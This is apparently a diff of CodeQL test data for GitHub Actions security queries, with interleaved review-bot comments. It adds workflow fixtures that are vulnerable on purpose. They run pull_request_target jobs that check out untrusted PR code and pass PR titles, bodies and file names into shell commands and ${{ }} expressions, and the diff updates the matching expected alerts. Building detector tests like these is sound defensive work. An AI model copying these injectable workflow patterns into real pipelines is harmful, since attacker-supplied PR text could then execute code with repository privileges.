| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 73413f51a392..90e7101e5fd6 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
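Review bot: The `#select` section adds two rows for the new step at `arg_injection.yml:34:14:36:41`, one naming `git` and one naming `sed` as the injected command. In that step `$BODY` is produced by `git log --format=%s` and is only interpolated into the `sed` argument, so `git` is the source rather than a sink, and the `git` row looks like a false positive being baked into the expected output rather than an intended result; this is inferred from the step text visible in the hunk, not from the query. Unless the query deliberately reports every command in a tainted run block, I would check the sink-identification logic before accepting this `.expected`, and the same pair of rows will presumably appear in `ArgumentInjectionMedium.expected`, whose hunk runs past the end of this chunk.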
@@ -1,19 +1,20 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| 
.github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n 
| -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" 
config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 153ebc5b733e..5aeb9aac7c52 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml 
@@ -1,26 +1,29 @@ -on: push +on: + pull_request_target: + +permissions: + actions: write jobs: job1: runs-on: ubuntu-latest - outputs: job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['pull_request']['body'] }} find: 'foo' replace: '' - id: step1 env: BODY: ${{ steps.step0.outputs.value}} - shell: powershell - run: | - Write-Output "::set-output name=MSG::$ENV{BODY}" + run: echo "::set-output name=MSG::${BODY}" - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index 3cab86f3171b..d149df2bd7ca 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -19,7 +19,9 @@ jobs: uses: actions/checkout@v4 - name: Extract Jira Key - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml new file mode 100644 index 000000000000..6d925a82d372 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml 
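Review bot: Nothing in the new fixture records that the `pull_request_target` trigger combined with a checkout of `${{ github.event.pull_request.head.ref }}` is deliberate, so a later cleanup could "fix" the workflow and silently drop the coverage; a top-of-file comment such as `# Fixture for CodeInjectionCritical: PR body -> step0 output -> step1..step5 -> job output -> sink; the head.ref checkout makes job1 an untrusted-checkout case` would pin the intent. The other new fixtures (test14.yml, test15.yml) check out `head.sha` rather than `head.ref`; if the untrusted-checkout model keys on the `ref:` value, it is worth stating in that comment that both spellings are meant to be covered. The added `permissions: actions: write` is not used by any step in the hunk — if it is there so the job counts as privileged for the query, say so in a comment, otherwise it can go. The new `run: echo "::set-output name=MSG::${BODY}"` relies on the deprecated `set-output` command; fine for a fixture, but a sibling step writing to `"$GITHUB_OUTPUT"` would keep the current mechanism covered (test15.yml already does this). The job's remaining steps continue outside the hunk.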
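Review bot: `$GITHUB_ENV` is left unquoted in the new `run:` line of test1.yml while the new test14.yml and test15.yml fixtures write to `"$GITHUB_ENV"`; `run: echo ISSUE_KEY=$(echo "$TITLE") >> "$GITHUB_ENV"` keeps the fixtures uniform and avoids ShellCheck noise if the repository ever lints them. A short comment on the step, `# TITLE (PR title) reaches the Sink step via $GITHUB_ENV rather than by direct expression injection`, would make clear which flow the modified test is meant to exercise. The surrounding steps of this workflow lie outside the hunk.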
@@ -0,0 +1,51 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test3: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test4: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml new file mode 100644 index 000000000000..a39967760e8e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
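Review bot: Each job checks out `${{ github.event.pull_request.head.sha }}` but then diffs `${{ github.sha }}`, which under `pull_request_target` refers to the base-branch commit, so if this workflow were ever executed `git diff-tree` would list that commit's files rather than the PR's — presumably irrelevant for a static fixture, but a comment should say the runtime value is not expected to be meaningful. A header comment such as `# Fixture: file names produced by git diff-tree on an untrusted checkout flow into step outputs / $GITHUB_ENV and then into ${{ }} expressions; four alerts expected` would document why there are four near-identical jobs and which sink each one targets. The file ends with three blank `+` lines, which should be trimmed.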
@@ -0,0 +1,38 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test3: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + test4: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 61c851a2cfa8..4c9ea8fe8ca4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
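Review bot: `${GITHUB_EVENT_PATH}` is unquoted in all four `jq` invocations while the same steps quote `"$GITHUB_OUTPUT"` and `"$GITHUB_ENV"`; `jq --raw-output .pull_request.title "${GITHUB_EVENT_PATH}"` keeps the quoting consistent within the fixture. A header comment like `# Fixture: PR title read from the event payload with jq, then exported via step output / $GITHUB_ENV into a ${{ }} expression; four alerts expected` would record what the four jobs test and that the `jq` read is meant to be modelled like `github.event.pull_request.title`. The two trailing blank `+` lines at the end of the file should be dropped.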
@@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n 
ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git 
diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo 
"TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | 
.github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | 
